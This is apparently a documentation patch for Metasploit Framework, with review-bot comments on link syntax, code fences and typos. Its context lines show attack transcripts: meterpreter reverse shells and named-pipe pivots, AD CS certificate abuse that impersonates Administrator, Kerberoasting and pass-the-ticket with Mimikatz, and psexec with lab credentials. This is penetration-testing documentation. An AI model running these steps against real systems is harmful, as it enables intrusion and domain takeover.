msf6 > use payload/windows/x64/meterpreter/reverse_tcp
smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
lhost => 172.19.182.171
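Review bot: The context line `smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost ...` has a stray leading "s" in the prompt; should be `msf6 payload(...)`.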
@@ -237,7 +237,7 @@ msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 by
Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
```
```msf
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
@@ -249,7 +249,7 @@ meterpreter > background
Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine. Note there is no need to start a handler for the named pipe payload.
```
```msf
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
@@ -267,7 +267,7 @@ msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o re
```
After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
```
```msf
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
@@ -383,7 +383,7 @@ Once routes are established, Metasploit modules can access the IP range specifie
### Socks Server Module Setup
Metasploit can launch a SOCKS proxy server using the module: `auxiliary/server/socks_proxy`. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:
```
```msf
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
@@ -291,7 +291,7 @@ Payload size: 6412437 bytes
Saved as: /tmp/met-stageless.exe
```
When this payload is executed, the transport is added and shown to be present in the transport list immediately:
```
```msf
msf exploit(handler) > [*] Meterpreter session 2 opened (172.16.52.1:4445 -> 172.16.52.247:49159) at 2015-12-13 11:06:54 +1000
msf exploit(handler) > sessions -i -1
@@ -331,7 +331,7 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t
Please do, making good use of the Github issues feature. Better still, create a PR for one!
[transport]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control
[transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
[inveigh]: https://github.com/Kevin-Robertson/Inveigh
## Currently Loadable Native Libraries
@@ -724,4 +724,4 @@ xml.sax.xmlreader
xmllib
xmlrpclib
zipfile
```
```
@@ -4,7 +4,7 @@ Metasploit gets hundreds of issue reports every year on our [issue tracker](http
But first...two important exceptions to bug/issue reports.
## When NOT to use Metasploit's issue tracker
## When NOT to use Metasploit's issue tracker
**NOTE:** There are two situations where, even if you have found what you know is a bug, you should not open a bug report on our public issue tracker.
1. You should not open a bug report on Metasploit Framework's issue tracker if you are a Metasploit Pro customer.
2. You should not open a bug report when you have found a security issue with Metasploit itself.
@@ -13,14 +13,14 @@ But first...two important exceptions to bug/issue reports.
If you are a Metasploit Pro customer, you can log in to Rapid7's customer support portal [here](https://www.rapid7.com/for-customers/). You are also able to reach out to your CSM or support representative if you prefer. To provide a consistent customer experience, Metasploit Framework community members, committers, and open-source developers do not offer support for commercial Rapid7 products. Rapid7's support resources and team members are well-equipped to handle your Metasploit Pro support needs!
### Security Issues
If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users.
If you have a security issue with Metasploit itself, you should email security@rapid7.com or let us know [here](https://www.rapid7.com/security/). Rapid7's disclosure policy is [here](https://www.rapid7.com/security/disclosure/). In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you'd like. They're also happy to keep you anonymous if that's what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users.
Now on to the good stuff! The Metasploit development community has read thousands of bug reports over the past 15 years, and a well-written bug report makes fixing bugs much faster and easier. In fact, in our experience, how quickly we can understand and fix an issue has more to do with bug report quality than the complexity of the bug itself.
## General Rules
* Ensure the platform you're reporting the issue for is supported. We do not, for instance, support Termux currently. If your platform is not officially supported, the community may still have resources to help, but you should search for and ask about those outside Metasploit's issue tracker.
* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [nightly installers are here](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) and typically offer the latest Framework release.
* Review our [code of conduct](https://github.com/rapid7/metasploit-framework/blob/master/CODE_OF_CONDUCT.md) before submitting issues.
* When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit's [[nightly installers are here|./Nightly-Installers.md]] and typically offer the latest Framework release.
* Review our [[code of conduct|./Code-Of-Conduct.md]] before submitting issues.
* Use a specific title so we can understand immediately which part of Metasploit is causing the unexpected behavior. "NoMethodError raised on smb_login module" is a great title. "Problem with Metasploit target" is not.
* Redact any private or sensitive data, such as target IPs or URLs, passwords, or personally identifying information.
* Please don't comment on closed issues; instead, open a new issue and link to any previous relevant issues.
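Review bot: the replacement links in this hunk (`[[nightly installers are here|./Nightly-Installers.md]]`, `[[code of conduct|./Code-Of-Conduct.md]]`) use wiki-link syntax rather than standard Markdown, so they will render as literal brackets in GitHub's file view and anywhere the docs-site preprocessor is not applied; confirm the docs build rewrites `[[text|./path.md]]` before merging, since the same pattern is used in every later hunk of this patch. The unchanged `* Redact any private or sensitive data` item is a good reminder to keep here, as later hunks show sample output that still carries real-looking hostnames and paths.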
@@ -31,7 +31,7 @@ We ask for several different pieces of information when users report issues in M
### Steps to reproduce
What did you do to get the results you got? Can you give us step-by-step instructions to get the same results you got? Are you able to consistently reproduce the issue in your own environment?
### Which OS are you using? What do we need to know about your environment and/or target?
### Which OS are you using? What do we need to know about your environment and/or target?
Tell us which operating system you're using and any relevant information about your setup. If the module or feature you're having trouble with requires any external dependencies, check whether they are installed, and (if not) whether installing them could solve your problem.
If you're having problems with a target (victim), tell us the target operating system and service versions.(Please ensure you've redacted any private or sensitive data!) If the module or feature you're having trouble with requires any external dependencies, check whether that could solve your problem.
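Review bot: the trailing context line `tell us the target operating system and service versions.(Please ensure you've redacted...` is missing a space after the period; since this hunk only touches whitespace on the heading above it, fixing `versions. (Please` at the same time is a cheap improvement.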
@@ -52,17 +52,17 @@ Did you install Metasploit with...
- [ ] Commercial installer (from <https://www.rapid7.com/products/metasploit/download/>)
- [ ] Source install (please specify Ruby version)
This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did.
This list isn't intended to be exhaustive - it's simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did.
## Avoid Duplicates
You may not be the first person to notice the problem you're seeing as a Framework user, and the more bug reports we get, the more difficult it is to sort through them all for easy fixes or high-priority issues. Here are some ways to help a previously-reported bug get noticed more quickly and prioritized (if necessary).
* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently.
* Having a problem with a module? Try [searching that module's name](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+is%3Aopen+psexec) to see if anyone else has reported (or fixed!) your problem recently.
* Getting a strange error and not sure what it means? [Search for the error](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue+URI.unescape) to see if others have had or addressed the same problem you are facing.
* Pro tip: Search both [open and closed issues](https://github.com/rapid7/metasploit-framework/issues?q=is%3Aissue) to see if what you're reporting was resolved (in which case you might simply need to update to a later version of Metasploit) or if there's a workaround someone else has discovered that might help you while we get to your issue.
* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described.
* If you DO discover that someone else has already reported the issue you're experiencing, please do update that issue with any new information - for instance, that you're experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described.
* If you find closed issues or resolved bugs that describe a problem you're having on a later version of Metasploit, that could indicate a regression (old bugs that have been reintroduced). It helps us if you note this in your issue report. Fixes for regressions can be fast, so making note of possible regressions is useful.
* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports.
* Finally, you might find a bug that's been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a **new** issue report and refer to any related issue reports.
## Other Notes
* Networking is hard, as we've often said even among ourselves! You might want to see if your network configuration is unusual in any way, or do a regular old internet search to check whether your config might be the problem.
@@ -73,10 +73,10 @@ You may not be the first person to notice the problem you're seeing as a Framewo
If you're a superhero and you figured out the root cause of a bug AND found a way to fix it, you can send your Metasploit fixes and improvements our way! The best way to get your fix into Metasploit quickly is to patch your own fork and submit a pull request to Metasploit. You get extra gratitude from all of us when you do this, and you'll also get a shout-out in the [weekly Metasploit wrap-up](https://blog.rapid7.com/tag/metasploit-weekly-wrapup/).
You can find a guide on setting up your own [Metasploit Development Environment here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment).
You can find a guide on setting up your own [[Metasploit Development Environment here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
## Public Discussion
Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com.
Some projects and companies don't like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we're always happy to speak privately. You can get in touch with us at msfdev@metasploit.com.
## Resolved Bugs
Your bug should be considered "Resolved" once there's a fix landed in the [Metasploit-Framework master branch](https://github.com/rapid7/metasploit-framework). People who track that branch will have the fix available quickly. It may take other distributions that include Metasploit (e.g., Kali) a few days to pull in fixes, depending on their individual release cadences.
@@ -10,7 +10,7 @@ clone, and all gems have to be reinstalled every time. Also, some rspec tests re
network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of
load, and builds time out.
The best way to diagnose these problems is simply to restart the build. Note, only [Committers](https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights) have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.
The best way to diagnose these problems is simply to restart the build. Note, only [[Committers|./Committer-Rights.md]] have rights to do this. If that doesn't clear things up, or if it's obvious that there are real failures (since you've read the rspec results and have read the tests), the first order of business is to undo your bad commit.
**Note**: in branches other than `master`, you can usually just fix things normally with new commits. There are plenty of "whoops" commit messages in our history.
@@ -40,7 +40,7 @@ If you already have msfconsole running, use a `reload_all` command to pick up yo
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1140 0 1140 0 0 3607 0 --:--:-- --:--:-- --:--:-- 7808
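Review bot: the two `curl -Lo` lines in this hunk fetch different revisions of the same gist (`.../raw/17f7e40ab905.../test_module.rb` versus `.../raw/6e5d2da61c82.../test_module.rb`), so the copy-paste instructions and the sample transcript below them no longer describe the same file; pick one revision (or drop the revision segment so the raw URL follows the gist head) and use it in both places. The `todb@ubuntu:~$ curl ...` line appearing twice looks like a trailing-whitespace-only change and is fine.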
@@ -48,7 +48,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
Then, in my msfconsole window:
```
```msf
msf > reload_all
[*] Reloading modules from all module paths...
IIIIII dTb.dTb _.---._
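Review bot: the fence change from ```` ``` ```` to ```` ```msf ```` assigns a language tag that standard highlighters (GitHub's linguist, highlight.js, Pygments) do not know, so the block will fall back to plain text or, with some renderers, emit a warning; this is fine if the docs site registers an `msf` lexer, but please confirm that before repeating the same change in the dozen or so fence hunks that follow in this patch.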
@@ -65,7 +65,7 @@ I love shells --egypt
+ -- --=[ 1122 exploits - 707 auxiliary - 192 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops
msf > use exploit/test/test_module
msf > use exploit/test/test_module
msf exploit(test_module) > info
Name: Fake Test Module
@@ -99,9 +99,9 @@ References:
msf exploit(test_module) > exploit
[*] Started reverse handler on 192.168.145.1:4444
[*] Started reverse handler on 192.168.145.1:4444
[+] Hello, world!
msf exploit(test_module) >
msf exploit(test_module) >
```
## Troubleshooting
@@ -116,7 +116,7 @@ That's really all there is to it. The most common problems that people (includin
Note that the `$HOME` directory for Metasploit Community Edition is going to be `root` and not your own user directory, so if you are expecting modules to show up in the Metasploit Pro web UIs, you will want to stash your external modules in `/root/.msf4/modules`. Of course, this means you need root access to the machine in question, but hey, you're a l33t Metasploit user, so that shouldn't be too hard.
Also note that if your modules are not displaying in the web UI, you should restart Pro service.
Also note that if your modules are not displaying in the web UI, you should restart Pro service.
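Review bot: the line being touched here, `you should restart Pro service.`, drops the article; since the hunk already rewrites it, `you should restart the Pro service.` would read better, and naming the actual service (or the command used to restart it) would make the advice actionable.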
### Windows
@@ -126,7 +126,7 @@ For Windows users, the above is all true, except for accessing the modules from
Any module that requires on changes to core library functions, such as new protocol parsers or other library mixins, aren't going to work out for you this way -- you're going to end up spewing errors all over the place as your module tries to load these classes. It's possible to write modules as completely self-contained in nearly all cases (thanks to Ruby's open class architecture), but such modules nearly always get refactored later to make the protocol and other mixin bits available to other modules.
In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [dev environment setup docs](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) for tons more on that.
In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch -- see the [[dev environment setup docs|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] for tons more on that.
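Review bot: the context line `Any module that requires on changes to core library functions` contains a typo that this hunk could have fixed while it was editing the paragraph (`relies on changes` or `requires changes`). The link rewrite itself to `./dev/Setting-Up-a-Metasploit-Development-Environment.md` matches the other hunks.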
## A final warning
@@ -61,5 +61,5 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
[WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
[WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
[winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
[Paranoid Mode]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode
[Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
[OJ]: https://github.com/OJ
@@ -2,7 +2,7 @@
Often times when testing Gem file updates, particularly from other repositories such as [rex-powershell](https://github.com/rapid7/rex-powershell) or [rex-text](https://github.com/rapid7/rex-text), one will need to find some way of testing whether the updated Gem file works as expected within Metasploit Framework. There are many different ways to do this, however this guide will only focus on one method for simplicities sake, as this is the one that has been known to work with the least amount of prerequisite setup.
## Instructions
1. Set up a working Metasploit development setup as described at the [Setting Up a Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) wiki page. Be sure to set up your SSH keys as part of this setup.
1. Set up a working Metasploit development setup as described at the [[Setting Up a Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] wiki page. Be sure to set up your SSH keys as part of this setup.
2. Clone whatever PR it is that you wish to work on. For example to work on <https://github.com/rapid7/rex-text/pull/30>, do `git clone git@github.com:rapid7/rex-text.git`, then `cd rex-text`, followed by `git checkout origin/pr/30`.
3. Go to the location of your git clone of Metasploit Framework and do `cp Gemfile.local.example Gemfile.local`. Ensure that no file named `Gemfile.local.lock` exists. If one does, remove it.
4. Inside your `Gemfile.local` file, edit it so it looks something like the following:
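Review bot: step 2, `git checkout origin/pr/30`, only works if the clone has a fetch refspec mapping `refs/pull/*/head` to `refs/remotes/origin/pr/*`; a plain `git clone git@github.com:rapid7/rex-text.git` does not create such refs, so a reader following these steps literally will get an unknown-revision error. Either document the refspec (the dev-environment page this hunk now links to describes it for the framework repo, but not for the gem repos) or use `git fetch origin pull/30/head:pr-30 && git checkout pr-30`. Minor: `for simplicities sake` in the intro line should be `for simplicity's sake`, and `Often times` should be `Oftentimes`.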
@@ -62,7 +62,7 @@ single_scanner
multi_scanner
```
The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [flavor](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers) specified for the command stager.
The `remote_exploit_cmd_stager` module type is used when writing an exploit for command execution or code injection vulnerabilities and provides the command to inject into the vulnerable code based on the [[flavor|./How-to-use-command-stagers.md]] specified for the command stager.
The `capture_server` module type is used when a module is designed to simulate a service to capture credentials for connecting clients.
@@ -22,7 +22,7 @@ If you go to metasploit-framework/documentation/modules, you'll see that there a
For example:
```
```msf
msf> use auxiliary/scanner/smb/smb_login
msf (smb_login)> info
@@ -40,4 +40,4 @@ These are just suggestions, but it'd be nice if the KB had these sections:
- **Vulnerable Applications** - Tells users what targets are vulnerable to the module and provides instructions on how to access vulnerable targets for testing.
- **Verification Steps** - Tells users how to use the module and what the expected results are from running the module.
- **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required.
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
@@ -154,7 +154,7 @@ To run the module, specify the login credentials for an AD user, and set `RHOSTS
This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from,
as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server:
```
```msf
msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
@@ -317,7 +317,7 @@ Getting a certificate as the current user is great, but what we really want to d
If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
CA => daforest-WIN-BR0CCBA815B-CA
@@ -358,7 +358,7 @@ To do this we will use the `ipcr_cert` module and we will set the usual options,
For the first run, we will set the usual `RHOSTS`, `CA`, and `CERT_TEMPLATE` details, being sure to set `CERT_TEMPLATE` to the vulnerable `ESC2-Template` certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable `ESC2-Template`:
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
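Review bot: the context line `To do this we will use the `ipcr_cert` module` names the module incorrectly; every command in the block uses `auxiliary/admin/dcerpc/icpr_cert`, and the same transposition (`ipcr_cert`) appears again in the `We'll first get the cert using `ipcr_cert`` line of the ESC3 hunk further down. Both should read `icpr_cert` so a reader searching for the module finds it.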
@@ -425,7 +425,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the `PFX` option to specify the PFX file, and the `ON_BEHALF_OF` setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default `User` certificate should work here since it allows enrollment by any authenticated domain user.
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
Module options (auxiliary/admin/dcerpc/icpr_cert):
@@ -540,7 +540,7 @@ Narrowing this list down to those we can actually enroll in as users, this leave
We'll first get the cert using `ipcr_cert` with the `ESC3-Template1` certificate.
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
@@ -608,7 +608,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
PFX => /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
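Review bot: the context line `Next we'll try use this certificate` is missing `to` (`try to use`), and it refers to the attack vector as `ESC3_TEMPLATE_2` while the template in the transcript is `ESC3-Template2`; using the template name consistently, or stating that ESC3_TEMPLATE_2 is the module's vector label rather than a template, avoids the reader hunting for a template that does not exist. The `set PFX /home/gwillcox/.msf4/loot/...` lines leak the author's home directory; a neutral path such as `~/.msf4/loot/<file>.pfx` reads better in shipped docs.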
@@ -662,7 +662,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
Just to show this is also possible with `ESC3-Template2` here is a snippet showing that also works:
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
CERT_TEMPLATE => ESC3-Template2
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
@@ -723,7 +723,7 @@ Certificates from Metasploit do not require a password, but if the certificate w
one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
run the `GET_TGT` action.
```
```msf
msf6 > use kerberos/get_ticket
Matching Modules
@@ -102,7 +102,7 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git
```
$ cd ~/git/metasploit-framework
$ cat .ruby-version
$ cat .ruby-version
3.0.2
$ ruby -v
ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
@@ -209,7 +209,7 @@ rake spec
```
You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
# Great! Now what?
We're excited to see your upcoming contributions of new modules, documentation, and fixes! Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues]. Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
@@ -217,7 +217,7 @@ We're excited to see your upcoming contributions of new modules, documentation,
Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue]. For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].
[commercial-installer]:http://metasploit.com/download
[open-source-installer]:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
[kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
[parrot-user-instructions]:https://parrotsec.org/docs/installation.html
[CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
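Review bot: since this hunk is updating link targets, the adjacent reference `[commercial-installer]:http://metasploit.com/download` should move to `https://` at the same time; it is the only plain-http link in the reference block and redirects anyway, so the cleartext hop is pure downside. The `[open-source-installer]` rewrite to `docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html` is consistent with the rest of the patch.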
@@ -240,14 +240,14 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
[find]:https://linux.die.net/man/1/find
[$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable
[msf-web-service]:https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service
[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html
[git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
[signing-howto]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys#signing-howto
[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto
[git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
[rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/
[wiki-documentation]:https://github.com/rapid7/metasploit-framework/wiki#metasploit-development
[wiki-documentation]:https://docs.metasploit.com/#metasploit-development
[newbie-friendly-prs-issues]:https://github.com/rapid7/metasploit-framework/issues?q=is%3Aopen+label%3Anewbie-friendly
[howto-PR]:https://help.github.com/articles/about-pull-requests/
[new issue]:https://github.com/rapid7/metasploit-framework/issues/new/choose
@@ -50,7 +50,7 @@ run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>
If you followed the lab setup setup above, this should output the following result:
```
```msf
msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local
[*] Running for 192.168.123.13...
@@ -108,7 +108,7 @@ and cracking the hash.
First an SPN needs to be found. This can be done in a number of ways - including using metasploit's
very own `auxiliary/gather/ldap_query` module:
```
```msf
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
RHOSTS => 172.16.199.235
@@ -169,7 +169,7 @@ Great, we now have a couple SPNs to move forward with.
If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs
found above:
```
```msf
meterpreter > load kiwi
Loading extension kiwi...
@@ -217,7 +217,7 @@ meterpreter > kerberos_ticket_list
**Export Service Tickets**
```
```msf
meterpreter > kiwi_cmd kerberos::list /export
[00000001] - 0x00000017 - rc4_hmac_nt
@@ -399,6 +399,6 @@ escalation is also possible as the user can be added into an elevated group such
The new ticket can be injected back into the memory with the following Mimikatz command in order to perform
authentication with the targeted service via Kerberos protocol.
```
```msf
meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi
```
@@ -17,7 +17,7 @@ Metasploit currently offers Kerberos authentication for the following services -
Open a WinRM session:
```
```msf
msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
@@ -42,7 +42,7 @@ C:\Users\Administrator>
Query LDAP for accounts:
```
```msf
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13
@@ -60,15 +60,25 @@ CN=Administrator CN=Users DC=adf3 DC=local
Name Attributes
---- ----------
badpwdcount 0
pwdlastset 133184302034979121
description Built-in account for administering the computer/domain
lastlogoff 1601-01-01 00:00:00 UTC
lastlogon 2023-01-23 11:02:49 UTC
logoncount 159
memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
| CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
inistrators,CN=Builtin,DC=domain,DC=local
name Administrator
objectsid S-1-5-21-3402587289-1488798532-3618296993-500
pwdlastset 133189448681297271
samaccountname Administrator
useraccountcontrol 512
... etc ...
```
Running psexec against a host:
```
```msf
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
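Review bot: the added LDAP attribute rows are inconsistently redacted: the unchanged header line reads `CN=Administrator CN=Users DC=adf3 DC=local` and the commands use `domain=demo.local`, while the new `memberof` values read `CN=Domain Admins,CN=Users,DC=domain,DC=local`, and the output now contains two `pwdlastset` rows with different values (`133184302034979121` and `133189448681297271`), which looks like the old and new sample runs were merged rather than replaced. Regenerate the block from one run against one lab domain so the DNs, domain name and attribute list all agree; an `objectsid` ending in `-500` is the built-in Administrator and is fine to keep.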
@@ -91,7 +101,7 @@ meterpreter >
Connect to a Microsoft SQL Server instance and run a query:
```
```msf
msf6 > use auxiliary/admin/mssql/mssql_sql
